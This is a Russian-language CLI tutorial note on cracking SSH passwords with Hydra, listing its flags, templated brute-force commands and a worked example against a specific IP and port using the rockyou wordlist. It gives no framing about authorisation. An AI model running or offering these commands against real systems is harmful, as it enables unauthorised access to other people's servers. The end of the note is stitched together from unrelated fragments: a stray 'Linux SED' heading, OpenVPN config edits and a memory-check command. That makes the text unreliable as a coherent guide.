10. Hydra
Как взломать пароль SSH с помощью Hydra!
Данный опус является частью единого цикла заметок o CLI. Для его написания использовалось множество различных источников (скилы крутых специалистов, статьи с тематических сайтов, техническая документация, комментарии с форумов и социальных сетей и т. д и т. п.). К сожалению, указать все источники точно не представляется возможным! По этому, в конце заметки, будет указана ссылка только на основной источник. Материалы, использованные для написания заметки, изменялись автором под конкретную задачу! Вам, скорее всего, тоже придется поступить аналогичным образом для получения желаемого результата)
Hydra — это мощный инструмент для взлома паролей методом брутфорс. Мы уже рассматривали использование Hydra для брута паролей на Kali Linux. Сегодня покажу, как с помощью Hydra взломать пароль SSH.
Hydra — это распараллеленый брутфорс паролей различных сервисов (FTP, POP3, IMAP, Telnet, HTTP Auth, NNTP, VNC, ICQ, PCNFS, CISCO и др.). С помощью этой утилиты вы можете атаковать несколько сервисов одновременно.
В основе программы лежит модульная структура. С помощью Гидры можно подобрать пароль к более чем 30 протоколам, включая telnet, ftp, http, https, smb, несколькими СУБД, и т.д. И да, Hydra брутит SSH. В целом Hydra отлично подойдет для взлома SSH. В этом примере использовался дистрибутив Parros OS, вы можете использовать Гидра на любом другом Linux-дистрибутиве.
Установка Hydra на Linux
Hydra предустановлена в Kali Linux и Parrot OS. Для установки Hydra на другие дистрибутивы, используйте команду apt.
apt install hydra
Для начала открываем справку:
hydra -h
Примеры использования Hydra для взлома пароля SSH:
В рамках этой статьи разберем пример взлома SSH. Для начала изучим аргументы:
-l — взлом пароля одного пользователя.
-L — взлом нескольких пользователей с помощью списка.
-p — взлом одного пароля.
-P — взлом паролей из списка.
-M — если много IP-адресов, используем этот аргумент для указания списка IP-адресов.
-v — для подробностей.
-V — отобразить журнал брута (логин+пароль).
-f — выйти, когда пароль найден.
-s — используется для указания порта, если служба не работает на порту по умолчанию
Это только часть аргументов инструмента, полный список найдете в справке.
Брут пароля
Если неизвестен пароль:
hydra -l имя_пользователя -P словарь_паролей sshБрут имени пользователя (если неизвестно имя пользователя):
hydra -L словарь_имен_пользователей -p пароль ssh
Брут имени пользователя и пароля (если неизвестно имя пользователя и пароль):
hydra -L словарь_имен_пользователей -P словарь_паролей IP_адрес ssh
Количество одновременных попыток перебора (По умолчанию инструмент запускает 16 потоков, но можно изменить это значение с помощью аргумента -t):
hydra -l имя_пользователя -P словарь_для_брута IP_адрес -t количество_потоков ssh
Изменение порта (иногда админы изменяют порт SSH со стандартного 22 на другой порт. Чтобы использовать другой порт, используем аргумент -s):
hydra -s номер_порта -l имя_пользователя -P словарь_для_брута ip-адрес ssh
Брутфорс списка IP-адресов (Можно также брутить несколько IP-адресов из списка -M ):
hydra -l имя_пользователя -P словарь_для_брута -M список_ip_адресов sshВзлом SSH с помощью Hydra (Рассмотрим реальный пример взлома SSH):
hydra -V -f -l u0_a150 -P /usr/share/wordlists/rockyou.txt 192.169.1.7 -s 8022 sshKOD:
Linux SED
Источник:
# /etc/openvpn/server.conf
- Комментируем строчки;
;push "redirect-gateway def1 bypass-dhcp"
;push "dhcp-option DNS 77.88.8.88"
;push "dhcp-option DNS 77.88.8.2"
- Перезапускаем демон;
# /etc/init.d/openvpn restart
Заметка:
Смотрим количество свободной оперативки:
# free
Cпасибо автору!
Источник:
https://spy-soft.net/crack-ssh-hydra/